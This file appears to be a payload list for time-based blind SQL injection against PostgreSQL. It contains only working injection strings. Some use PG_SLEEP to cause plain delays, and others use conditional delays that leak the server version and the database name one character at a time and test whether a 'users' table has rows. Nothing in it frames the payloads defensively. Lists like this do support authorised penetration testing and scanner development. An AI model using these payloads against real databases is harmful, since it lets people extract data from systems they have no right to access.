# PostgreSQL — Time-Based Blind Payloads

# --- Basic delay ---
' OR PG_SLEEP(5)--
'; SELECT PG_SLEEP(5)--
'; SELECT PG_SLEEP(5)-- -
%';SELECT PG_SLEEP(5)--
1;SELECT PG_SLEEP(5)--
' AND 1=(SELECT 1 FROM PG_SLEEP(5))--
' AND (SELECT * FROM (SELECT(PG_SLEEP(5)))a)--
1' AND (SELECT 1337 FROM (SELECT(PG_SLEEP(5)))a)-- -

# --- Conditional delay ---
' AND CASE WHEN (1=1) THEN PG_SLEEP(5) ELSE PG_SLEEP(0) END--
' AND CASE WHEN (1=2) THEN PG_SLEEP(5) ELSE PG_SLEEP(0) END--
' AND CASE WHEN (SUBSTRING(version(),1,10)='PostgreSQL') THEN PG_SLEEP(5) ELSE PG_SLEEP(0) END--
' AND CASE WHEN (SUBSTRING(current_database(),1,1)='a') THEN PG_SLEEP(5) ELSE PG_SLEEP(0) END--
' AND CASE WHEN (ASCII(SUBSTRING(current_database(),1,1))>96) THEN PG_SLEEP(5) ELSE PG_SLEEP(0) END--
' AND CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN PG_SLEEP(5) ELSE PG_SLEEP(0) END--
');SELECT PG_SLEEP(5)--
